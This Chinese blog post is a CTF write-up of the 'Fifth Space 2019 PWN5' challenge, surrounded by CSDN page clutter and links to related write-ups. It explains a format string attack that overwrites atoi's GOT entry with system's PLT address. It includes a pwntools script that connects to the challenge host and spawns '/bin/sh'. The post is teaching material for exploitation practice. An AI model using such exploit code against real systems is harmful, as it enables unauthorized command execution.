第五空间pwn5

最新推荐文章于 2024-04-09 15:32:25 发布
最新推荐文章于 2024-04-09 15:32:25 发布
阅读量227 收藏
点赞数
分类专栏: 二进制漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46441427/article/details/118398849
版权
本文详细介绍了如何通过格式化字符串漏洞修改atoi函数的 GOT 表,使其在调用时跳转到system函数,从而执行/bin/sh。使用了pwn库中的fmtstr_payload函数来构造payload,实现了远程服务器上的命令执行。
摘要由CSDN通过智能技术生成

文章目录

一、题目特征

在这里插入图片描述

在这里插入图片描述

二、分析

方法1

格式化字符串漏洞,那直接改那个函数的值
直接修改atoi函数的.got.plt表地址
这样在调用atoi函数的时候,可以直接在公共plt表跳转到system函数
确定偏移为10
在这里插入图片描述

from pwn import*

p = remote('node4.buuoj.cn','27870')
elf = ELF('./pwn')
atoi_got = elf.got['atoi']
system_plt = elf.plt['system']

payload=fmtstr_payload(10,{atoi_got:system_plt})

p.sendline(payload)
p.sendline('/bin/sh\x00')

p.interactive()

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
第一个参数表示格式化字符串的偏移;
第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将atio的GOT数据改为system的plt函数地址,就写{atoi_got:system_plt}
第三个参数表示已经输出的字符个数,这里没有,为0,采用默认值即可;
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写。
fmtstr_payload函数返回的就是payload

三.参考文章

深入了解GOT,PLT和动态链接
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测

Akura@lan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[第五空间2019 决赛]PWN5
m0_52231248的博客
11-02 102
[第五空间2019 决赛]PWN5 题目Ubuntu16,libc2.23 Checksec检查发现开启了canary和nx 进入main函数发现gets函数存在格式化字符串漏洞 并且程序会检查我们输入的password是否等于unk_804C044这个随机数,成功会直接给我们调用system(“/bin/sh”),因此我们检查unk_804C044位置发现位于bss段 接下来只要确认我们输入的数据到unk_804C044的偏移即可修改unk_804C044。 可以通过.%p或者gd
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 423
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
CTFshow-pwn入门-前置基础pwn5 - pwn12
T1ngSh0w的博客
06-17 1199
CTFshow-pwn入门-前置基础-pwn5-pwn12
[第五空间2019 决赛]PWN5 (字符串漏洞)——两种解法
qq_41696518的博客
07-13 2619
[第五空间2019 决赛]PWN5 ——两种解法
[第五空间2019 决赛]PWN5——三种方法
l2645470582_的博客
08-07 285
偏移量为10,32为是栈地址,64位是寄存器。
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 809
BUUCTF--pwn--[第五空间2019 决赛]PWN5
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
【Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
【Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
Buuctf[第五空间决赛2024]pwn5(2),这份字节跳动历年校招网络安全面试真题解析
最新发布
2401_84160272的博客
04-09 275
1.检查文件发现为32位2.ida32反编译从 /dev/urandom 中读取了四个字节的随机数,将其存储数据到unk_804c044所指向的内存,然后要求用户输入name和passwd。用户输入name后,它会直接将输入内容输出到屏幕上,然后要求用户输入passwd。程序将尝试将用户输入的passwd转换为整数,如果与之前生成的随机数相等,则输出"ok!!“并调用 /bin/sh执行 shell;否则输出"fail”发现存在格式化字符串漏洞。
pwn05(应对简单栈溢出的常规套路)
Welcome To Myon'Blog !
07-07 500
一、常规检查(nc、file、checksec) 二、IDA反编译,只找两个东西即可 1、寻找造成栈溢出的函数的地址到ebp的距离 2、寻找我们所要利用的函数的地址(即我们希望程序最后返回到哪里) 三、编写并运行exp脚本
【pwn】[第五空间2019 决赛]PWN5
ethan18的博客
07-13 263
函数的逻辑(就是上面那个伪代码),可以看出,主要是需要让我们的passwd输入值和从文件中输入的值保持相同,但是很明显我们根本就不知道这个。可以数出,0x41414141是格式化字符串的第10个参数,所以我们构造的时候就需要从。这是Buuctf的一道题,是我实战遇到的第一道格式字符串漏洞,在此记录。对于格式化字符串漏洞,我们首先要确定输入点是栈中的第几个参数。函数里面直接输入了地址,表明是有格式字符串漏洞的。,我们一个字节一个字节的存入,所以不能是直接用。,将输出的字符串的数量覆盖进所指向的位置。
PWN——[第五空间2019 决赛]PWN5
有头发的埼玉
11-14 483
完全通过静态分析得到题解,与网传算法不同
writeUP-[第五空间2019 决赛]PWN5(待进一步完善待研究内容)
weixin_52111404的博客
08-02 2250
通过PWN5一题尝试理解格式化字符串漏洞。
kernel pwn-kernel UAF
qq_46441427的博客
10-24 2219
不同于用户态pwn,内核pwn就不是用python远程拿shell,而是给一个环境包,下载qemu本地起系统。给定以下文件 boot.sh: 一个用于启动 kernel 的 shell 的脚本,多用 qemu,保护措施与 qemu 不同的启动参数有关 bzImage: kernel binary rootfs.cpio: 文件系统映像 ...
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值